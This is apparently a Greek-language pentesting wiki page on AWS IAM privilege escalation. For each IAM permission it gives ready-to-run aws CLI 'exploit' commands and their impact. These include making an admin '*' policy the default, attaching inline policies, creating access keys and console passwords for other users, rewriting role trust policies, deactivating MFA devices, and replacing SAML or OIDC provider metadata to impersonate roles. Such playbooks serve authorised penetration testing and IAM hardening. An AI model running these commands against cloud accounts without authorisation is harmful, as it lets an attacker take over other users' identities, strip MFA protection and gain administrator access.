AWS - IAM Privesc

IAM

Για περισσότερες πληροφορίες σχετικά με το IAM, ελέγξτε:

iam:CreatePolicyVersion

Παρέχει τη δυνατότητα δημιουργίας μιας νέας έκδοσης πολιτικής IAM, παρακάμπτοντας την ανάγκη για άδεια iam:SetDefaultPolicyVersion χρησιμοποιώντας την επιλογή --set-as-default. Αυτό επιτρέπει τον καθορισμό προσαρμοσμένων αδειών.

Exploit Command:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Impact: Αυξάνει άμεσα τα δικαιώματα επιτρέποντας οποιαδήποτε ενέργεια σε οποιοδήποτε πόρο.

iam:SetDefaultPolicyVersion

Επιτρέπει την αλλαγή της προεπιλεγμένης έκδοσης μιας πολιτικής IAM σε μια άλλη υπάρχουσα έκδοση, ενδεχομένως αυξάνοντας τα δικαιώματα αν η νέα έκδοση έχει περισσότερες άδειες.

Bash Command:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Επίπτωση: Έμμεση κλιμάκωση προνομίων επιτρέποντας περισσότερες άδειες.

iam:CreateAccessKey

Επιτρέπει τη δημιουργία αναγνωριστικού κλειδιού πρόσβασης και μυστικού κλειδιού πρόσβασης για άλλο χρήστη, οδηγώντας σε πιθανή κλιμάκωση προνομίων.

Εκμετάλλευση:

aws iam create-access-key --user-name <target_user>

Impact: Άμεση κλιμάκωση δικαιωμάτων αναλαμβάνοντας τις εκτεταμένες άδειες άλλου χρήστη.

iam:CreateLoginProfile | iam:UpdateLoginProfile

Επιτρέπει τη δημιουργία ή την ενημέρωση ενός προφίλ σύνδεσης, συμπεριλαμβανομένου του καθορισμού κωδικών πρόσβασης για τη σύνδεση στο AWS console, οδηγώντας σε άμεση κλιμάκωση δικαιωμάτων.

Exploit for Creation:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Εκμετάλλευση για Ενημέρωση:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Επίπτωση: Άμεση κλιμάκωση προνομίων με την είσοδο ως "οποιοσδήποτε" χρήστης.

iam:UpdateAccessKey

Επιτρέπει την ενεργοποίηση ενός απενεργοποιημένου κλειδιού πρόσβασης, που μπορεί να οδηγήσει σε μη εξουσιοδοτημένη πρόσβαση αν ο επιτιθέμενος κατέχει το απενεργοποιημένο κλειδί.

Εκμετάλλευση:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Επίπτωση: Άμεση κλιμάκωση προνομίων επανενεργοποιώντας τα κλειδιά πρόσβασης.

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

Επιτρέπει τη δημιουργία ή την επαναφορά διαπιστευτηρίων για συγκεκριμένες υπηρεσίες AWS (π.χ., CodeCommit, Amazon Keyspaces), κληρονομώντας τα δικαιώματα του σχετικού χρήστη.

Εκμετάλλευση για Δημιουργία:

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Εκμετάλλευση για Επαναφορά:

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Επίπτωση: Άμεση κλιμάκωση προνομίων μέσα στις άδειες υπηρεσίας του χρήστη.

iam:AttachUserPolicy || iam:AttachGroupPolicy

Επιτρέπει την προσθήκη πολιτικών σε χρήστες ή ομάδες, κλιμακώνοντας άμεσα τα προνόμια κληρονομώντας τις άδειες της προσαρτημένης πολιτικής.

Εκμετάλλευση για Χρήστη:

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Εκμετάλλευση για Ομάδα:

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Επίπτωση: Άμεση κλιμάκωση προνομίων σε οτιδήποτε παρέχει η πολιτική.

iam:AttachRolePolicy, ( sts:AssumeRole|iam:createrole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

Επιτρέπει την προσάρτηση ή την τοποθέτηση πολιτικών σε ρόλους, χρήστες ή ομάδες, επιτρέποντας άμεση κλιμάκωση προνομίων παρέχοντας επιπλέον άδειες.

Εκμετάλλευση για Ρόλο:

aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Εκμετάλλευση για Inline Policies:

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

Μπορείτε να χρησιμοποιήσετε μια πολιτική όπως:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}

Επίπτωση: Άμεση κλιμάκωση δικαιωμάτων προσθέτοντας άδειες μέσω πολιτικών.

iam:AddUserToGroup

Επιτρέπει την προσθήκη του εαυτού σε μια ομάδα IAM, κλιμακώνοντας τα δικαιώματα κληρονομώντας τις άδειες της ομάδας.

Εκμετάλλευση:

aws iam add-user-to-group --group-name <group_name> --user-name <username>

Επίπτωση: Άμεση κλιμάκωση προνομίων στο επίπεδο των δικαιωμάτων της ομάδας.

iam:UpdateAssumeRolePolicy

Επιτρέπει την τροποποίηση του εγγράφου πολιτικής ανάθεσης ρόλου ενός ρόλου, επιτρέποντας την ανάληψη του ρόλου και των σχετικών δικαιωμάτων του.

Εκμετάλλευση:

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Όπου η πολιτική φαίνεται όπως η παρακάτω, η οποία δίνει στον χρήστη άδεια να αναλάβει τον ρόλο:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Impact: Άμεση κλιμάκωση προνομίων με την ανάληψη των δικαιωμάτων οποιουδήποτε ρόλου.

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

Επιτρέπει την ανέβασμα ενός δημόσιου κλειδιού SSH για την αυθεντικοποίηση στο CodeCommit και την απενεργοποίηση συσκευών MFA, οδηγώντας σε πιθανή έμμεση κλιμάκωση προνομίων.

Exploit for SSH Key Upload:

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

Εκμετάλλευση για την Απενεργοποίηση MFA:

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Impact: Έμμεση κλιμάκωση προνομίων επιτρέποντας την πρόσβαση στο CodeCommit ή απενεργοποιώντας την προστασία MFA.

iam:ResyncMFADevice

Επιτρέπει την επανασυγχρονισμό μιας συσκευής MFA, ενδεχομένως οδηγώντας σε έμμεση κλιμάκωση προνομίων μέσω της χειραγώγησης της προστασίας MFA.

Bash Command:

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Impact: Έμμεση κλιμάκωση προνομίων προσθέτοντας ή χειρίζοντας συσκευές MFA.

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

Με αυτές τις άδειες μπορείτε να αλλάξετε τα XML μεταδεδομένα της σύνδεσης SAML. Στη συνέχεια, θα μπορούσατε να εκμεταλλευτείτε τη συνομοσπονδία SAML για να συνδεθείτε με οποιονδήποτε ρόλο που το εμπιστεύεται.

Σημειώστε ότι κάνοντας αυτό οι νόμιμοι χρήστες δεν θα μπορούν να συνδεθούν. Ωστόσο, θα μπορούσατε να αποκτήσετε το XML, ώστε να βάλετε το δικό σας, να συνδεθείτε και να ρυθμίσετε το προηγούμενο πίσω.

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)

(Δεν είμαι σίγουρος γι' αυτό) Αν ένας επιτιθέμενος έχει αυτές τις άδειες θα μπορούσε να προσθέσει μια νέα Thumbprint για να καταφέρει να συνδεθεί σε όλους τους ρόλους που εμπιστεύονται τον πάροχο.

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

Αναφορές

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/